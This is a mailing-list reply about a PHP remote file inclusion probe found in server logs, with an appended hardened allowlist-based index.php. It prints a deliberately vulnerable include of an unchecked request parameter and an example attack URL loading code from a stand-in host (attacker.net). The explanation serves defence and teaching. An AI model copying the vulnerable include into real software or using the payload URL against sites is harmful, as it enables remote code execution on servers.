[BlueOnyx:08498] Re: Making sense of log files...

Michael Stauber mstauber at blueonyx.it
Fri Sep 16 15:47:45 -05 2011


Hi Wayne,

> but recently I've been paying more attention to them.
> 
> this is the log from dfix:
> 
> Not really sure what it means other than it blocked the IP address.
> 
> ?p=1693 is a valid link on my site,  does that mean this is the page they
> tried to take over and they are coming from hackorea ?

Yeah, this is a common attack vector for PHP scripts. Someone probes your PHP 
scripts to see if he can trick them into loading, including and running an 
externally hosted PHP script.

In your case the external script would just show "ShiroHigeShiroHige" 
somewhere within your page *if* the probing had revealed a vulnerability and 
only the attacker would see that. But then the attacker would probably have 
escalated by including something more nasty. :o)

Say you have this code on your website:

<?php
// This is a vulnerable index.php and the code below is a really bad idea:
// (the original relied on register_globals to fill $page from the query string;
// the explicit assignment below does the same on a current PHP)
$page = $_GET['page'];
include_once($page);
/* ... rest of your page */
?>

Now *if* you'd usually call subpages for your site with something like this 
...

http://www.site.com/index.php?page=<number>

... then the attacker could trick your badly coded index.php into loading an 
external and even remotely hosted PHP file by simply calling up your index.php 
this way:

http://www.site.com/index.php?page=http://attacker.net/include_me.txt

To prevent stuff like that from happening, Blueonyx usually sets the following 
two switches in php.ini:

allow_url_fopen = Off
allow_url_include = Off

These are the safe settings for them and prevent PHP scripts from accessing 
and including remotely hosted, non-local PHP scripts.

"allow_url_fopen" prevents PHP scripts from accessing non-local files which are 
called via a URL.

"allow_url_include" controls if it is allowed to include remotely hosted PHP 
code into your local scripts for execution, which is a really bad idea, so it 
should always be set to "Off". 

There may be reasons when you may want to allow "allow_url_fopen", though. 
Like when your PHP script needs to access a remote RSS feed, or needs to 
connect somewhere else to see if there are updates available for its 
components. However: if you allow "allow_url_fopen", be sure to double check 
that "allow_url_include" is set to "Off".

Short summary: Access = fine. Include = bad.

-- 
With best regards

Michael Stauber
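
Added example, not part of Michael's message or of BlueOnyx: a hardened replacement for the vulnerable index.php shown above. The request parameter is only used as a key into an allowlist of local files, so "page=http://attacker.net/include_me.txt" can never reach include_once, and the script refuses to run at all if php.ini still has allow_url_include on. File names and page numbers are constructed sample values.

```php
<?php
// Added example (not from the original post): hardened index.php that maps the
// "page" request parameter to a local file through an allowlist.
declare(strict_types=1);

// Allowlist: request value => local file below this directory (constructed sample values).
const PAGES = [
    '1'    => 'pages/home.php',
    '1693' => 'pages/article-1693.php',
];

/**
 * Resolve the "page" request parameter to an absolute local path, or null if
 * the value is not in the allowlist or the target does not exist below $baseDir.
 * A URL such as "http://attacker.net/include_me.txt" is simply not a key in PAGES.
 */
function resolve_page(?string $requested, string $baseDir): ?string
{
    if ($requested === null || !isset(PAGES[$requested])) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // realpath() returns false for missing files and collapses "..", so the
    // prefix check below confirms the file really lives under $baseDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/** True when php.ini has allow_url_include = Off (the only acceptable state). */
function remote_include_disabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (!remote_include_disabled()) {
    http_response_code(500);
    exit('allow_url_include must be Off in php.ini');
}

$file = resolve_page($_GET['page'] ?? null, __DIR__);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include_once $file;
/* ... rest of your page */
```

The remote_include_disabled() check is belt and braces: with the allowlist in place a remote include cannot happen through this script, but the check makes a misconfigured php.ini visible instead of silent.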


